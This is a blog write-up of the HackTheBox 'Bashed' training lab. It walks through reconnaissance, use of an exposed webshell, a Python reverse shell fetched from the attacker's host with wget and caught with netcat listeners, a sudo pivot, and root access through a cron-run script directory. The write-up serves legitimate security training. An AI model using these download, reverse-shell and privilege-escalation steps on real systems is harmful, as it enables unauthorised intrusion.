Finn Lestrange

Finn Lestrange

Computer Science Student.

HTB - Bashed Writeup - 10.10.10.68

2 minute read

Alt Text

HackTheBox - Bashed - 10.10.10.68 - Writeup

This machine is rated easy dificulty and requires knowledge of the linux sudo and sudo -l commands. The initial phase only requires some simple enumeration of an apache webpage which turns out to be running a webshell.

1. Recon

nmap -sC -sV -oA nmap/bashed 10.10.10.68 Alt Text We can see that the only open port on the machine is Apache httpd

http://10.10.10.68 Alt Text There is an article on the page stating that some sort of php file called phpbash was developed on the machine, we can try running gobuster to enumerate possible directories

gobuster dir -u http://10.10.10.68 -w /usr/../.../..2.3-medium.txt Alt Text We see that we got a hit for a \dev directory and seeing as the phpbash was developed on the machine there is a good chance it is in that directory

Bingo! A webshell

Alt Text Alt Text

2. Exploitation

To exploit this machine is would be nicer to have an actual shell so I created a simple python reverse shell and started a netcat listener aswell as a python http server to get the file to the remote machine. cat rev.py Alt Text which python Alt Text nc -lvnp 9004 Alt Text wget 10.10.14.17/rev.py Alt Text

Reverse Shell

Alt Text

Now that we have a proper shell we can do some enumeration and also read the user flag Alt Text We can also see that there is a user scriptmanager who we could escalate privelages to sudo -l - will tell use what commands we can run as other users Alt Text As we can run every command - All as scriptmanger with no password, we can just spawn a shell as them using the bash command

sudo -u scriptmanager /bin/bash - will get us a shell as scriptmanger Alt Text

3. Privelage Escalation from scriptmanger to root

After some manual enumeration of the system there appears to be an unusual directory, /scripts which contains test.py and test.txt Alt Text This python script seems to be run by some process, probably a cron job, we could try to exploit this by uploading a malicious python reverse shell to get a shell as root. cp rev.py revroot.py cat revroot.py Alt Text Notice how our revroot.py file has a different port then out inital rev.py shell, this is so it does not interfere with our existing reverse shell.

We will upload revroot.py to the box using the same python http server Alt Text wget 10.10.14.17\revroot.py Alt Text

Now all we have to do is open a new netcat listener on port 1337 and wait nc -lvnp 1337 Alt Text

Rooted!

If you enjoyed my writeup or found it useful consider checking out my github or my hackthebox profile.

Hack The Box Finn Lestrange's DEV Profile